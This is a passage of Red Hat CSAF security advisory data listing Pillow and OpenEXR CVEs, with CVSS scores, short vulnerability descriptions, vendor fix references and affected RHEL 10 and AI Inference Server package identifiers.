"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
},
{
"cve": "CVE-2026-42309",
"cwe": {
"id": "CWE-131",
"name": "Incorrect Calculation of Buffer Size"
},
"discovery_date": "2026-05-09T06:01:11.401932+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2468458"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A malicious actor could exploit this vulnerability by providing specially crafted nested lists as coordinates to image processing APIs within Pillow. This could lead to a heap buffer overflow, potentially causing a denial of service in applications using the library.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via specially crafted coordinate input",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact vulnerability in the Pillow Python imaging library could lead to a denial of service. Applications processing untrusted image data that utilize specific Pillow APIs, such as `ImagePath.Path`, `ImageDraw.ImageDraw.polygon`, or `ImageDraw.ImageDraw.line`, with specially crafted nested list coordinates are susceptible to a heap buffer overflow.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42309"
},
{
"category": "external",
"summary": "RHBZ#2468458",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2468458"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42309",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42309"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42309",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42309"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2"
}
],
"release_date": "2026-05-09T04:08:10.517000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Pillow: Pillow: Denial of Service via specially crafted coordinate input"
},
{
"cve": "CVE-2026-42310",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-05-09T06:01:21.465052+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2468461"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could supply a specially crafted malicious PDF file, causing the application to hang indefinitely and consume 100% CPU. This vulnerability leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via malicious PDF processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42310"
},
{
"category": "external",
"summary": "RHBZ#2468461",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2468461"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42310",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42310"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42310",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42310"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468",
"url": "https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9519",
"url": "https://github.com/python-pillow/Pillow/pull/9519"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7"
}
],
"release_date": "2026-05-09T04:10:48.395000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Pillow: Pillow: Denial of Service via malicious PDF processing"
}
]
}
RHSA-2026:7682
Vulnerability from csaf_redhat - Published: 2026-04-13 02:30 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 10.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:7682",
"url": "https://access.redhat.com/errata/RHSA-2026:7682"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_7682.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:30+00:00",
"generator": {
"date": "2026-05-14T22:36:30+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:7682",
"initial_release_date": "2026-04-13T02:30:41+00:00",
"revision_history": [
{
"date": "2026-04-13T02:30:41+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-13T02:30:41+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:30+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_1.1.src",
"product": {
"name": "openexr-0:3.1.10-8.el10_1.1.src",
"product_id": "openexr-0:3.1.10-8.el10_1.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_1.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_1.1.aarch64",
"product": {
"name": "openexr-0:3.1.10-8.el10_1.1.aarch64",
"product_id": "openexr-0:3.1.10-8.el10_1.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_1.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"product_id": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_1.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_1.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_1.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_1.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"product_id": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_1.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_1.1.ppc64le",
"product": {
"name": "openexr-0:3.1.10-8.el10_1.1.ppc64le",
"product_id": "openexr-0:3.1.10-8.el10_1.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_1.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"product_id": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_1.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_1.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_1.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_1.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"product_id": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_1.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_1.1.x86_64",
"product": {
"name": "openexr-0:3.1.10-8.el10_1.1.x86_64",
"product_id": "openexr-0:3.1.10-8.el10_1.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_1.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"product_id": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_1.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_1.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_1.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_1.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"product_id": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_1.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.10-8.el10_1.1.s390x",
"product": {
"name": "openexr-0:3.1.10-8.el10_1.1.s390x",
"product_id": "openexr-0:3.1.10-8.el10_1.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.10-8.el10_1.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"product": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"product_id": "openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.10-8.el10_1.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"product": {
